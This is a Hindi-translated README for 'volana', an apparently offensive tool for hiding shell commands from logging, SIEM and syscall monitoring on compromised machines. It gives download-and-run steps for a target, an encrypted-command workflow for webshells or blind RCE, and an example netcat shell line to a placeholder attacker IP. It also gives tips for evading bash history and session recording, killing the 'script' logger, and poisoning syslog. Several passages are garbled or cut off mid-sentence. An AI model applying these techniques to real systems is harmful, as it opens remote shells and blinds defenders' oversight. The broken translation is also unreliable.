
🌒 शैल कमांड अस्पष्टीकरण ताकि पहचान प्रणालियों से बचा जा सके
पेंटेस्ट के दौरान, एक महत्वपूर्ण पहलू है। इस कारण से आपको अपने गुजरने के बाद चाहिए। फिर भी, कई बुनियादी ढांचे कमांड लॉग करते हैं और उन्हें वास्तविक समय में SIEM को भेजते हैं, जिससे बाद में सफाई करना अकेले बेकार हो जाता है। समझौता की गई मशीन पर निष्पादित कमांड को छिपाने का एक सरल तरीका प्रदान करता है, अपना स्वयं का शेल रनटाइम प्रदान करके (अपना कमांड दर्ज करें, volana आपके लिए निष्पादित करता है)। इस प्रकार आप
volanaआपको एक इंटरैक्टिव शेल प्राप्त करने की आवश्यकता है। (इसे स्पॉन करने का एक तरीका खोजें, आप एक हैकर हैं, यह आपका काम है! अन्यथा)। फिर इसे लक्ष्य मशीन पर डाउनलोड करें और लॉन्च करें। बस इतना ही, अब आप वह कमांड टाइप कर सकते हैं जिसे आप छिपाकर निष्पादित करना चाहते हैं।
## इसे github release से डाउनलोड करें
## यदि समझौता की गई मशीन से इंटरनेट एक्सेस नहीं है, तो कोई दूसरा तरीका खोजें
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana
## इसे निष्पादित करें
./volana
## अब आप रडार के नीचे हैं
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #आप थोड़ा अकड़ने की अनुमति रखते हैं
volana » [command]
volana कंसोल के लिए कीवर्ड:
ring: रिंग मोड सक्षम करता है अर्थात प्रत्येक कमांड को ट्रैक्स को कवर करने के लिए कई अन्य कमांड के साथ लॉन्च किया जाता है (उस समाधान से जो सिस्टम कॉल की निगरानी करता है)exit: volana कंसोल से बाहर निकलेंकल्पना करें कि आपके पास एक गैर-इंटरैक्टिव शेल है (वेबशेल या ब्लाइंड आरसीई), आप encrypt और decrypt उपकमांड का उपयोग कर सकते हैं। पहले, आपको एम्बेडेड एन्क्रिप्शन कुंजी के साथ volana बनाना होगा।
हमलावर मशीन पर
## एन्क्रिप्शन कुंजी के साथ volana बनाएं
make build.volana-with-encryption
## इसे लक्ष्य पर स्थानांतरित करें (एकमात्र पहचाने जाने योग्य कमांड)
## [...]
## उस कमांड को एन्क्रिप्ट करें जिसे आप छिपाकर निष्पादित करना चाहते हैं
## (यहाँ एक इंटरैक्टिव शेल प्राप्त करने के लिए nc bindshell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
एन्क्रिप्टेड कमांड को कॉपी करें और अपने आरसीई के साथ लक्ष्य मशीन पर निष्पादित करें
./volana decr [encrypted_command]
## अब आपके पास एक bindshell है, इसे इंटरैक्टिव बनाने के लिए स्पॉन करें और सामान्य रूप से volana का उपयोग करें ताकि छिपा रह सकें (./volana)। + जाने से पहले volana बाइनरी को हटाना न भूलें (क्योंकि डिक्रिप्शन कुंजी आसानी से इसमें से प्राप्त की जा सकती है)
क्यों न केवल echo [command] | base64 के साथ कमांड छुपाएं?
और लक्ष्य पर echo [encoded_command] | base64 -d | bash के साथ डिकोड करें।
क्योंकि हम उन सिस्टम से सुरक्षित रहना चाहते हैं जो base64 उपयोग के लिए अलर्ट ट्रिगर करते हैं या कमांड में base64 टेक्स्ट खोजते हैं। साथ ही हम जांच को कठिन बनाना चाहते हैं और base64 एक वास्तविक ब्रेक नहीं है।
ध्यान रखें कि volana कोई चमत्कार नहीं है जो आपको पूरी तरह से अदृश्य बना देगा। इसका उद्देश्य घुसपैठ का पता लगाने और जांच को कठिन बनाना है।
पता लगाने से हमारा मतलब है कि क्या हम किसी विशेष कमांड के निष्पादित होने पर अलर्ट ट्रिगर करने में सक्षम हैं।
केवल volana लॉन्च करने वाली कमांड लाइन पकड़ी जाएगी। 🧠 हालांकि, इसे निष्पादित करने से पहले एक स्पेस जोड़ने पर, डिफ़ॉल्ट बैश व्यवहार इसे सहेजना नहीं है।
.bash_history, ".zsh_history" आदि ..opensnoop)script, screen -L, sexonthebash, ovh-ttyrec, आदि..)
pkill -9 scriptscreen से बचना थोड़ा अधिक कठिन है, हालांकि यह इनपुट रजिस्टर नहीं करता (गुप्त इनपुट: stty -echo => बचें)volana का उपयोग करके कमांड डिटेक्शन से बचा जा सकता है/var/log/auth.log)
sudo या su कमांड के लिएlogger -p auth.info "No hacker is poisoning your syslog solution, don't worry")LD_PRELOAD इंजेक्शन
क्लिकबेट शीर्षक के लिए खेद है, लेकिन योगदानकर्ताओं के लिए कोई पैसा प्रदान नहीं किया जाएगा। 🐛
कृपया मुझे बताएं यदि आपको मिला है:
volana का पता लगाने का एक तरीकाvolana कमांड का पता नहीं लगाता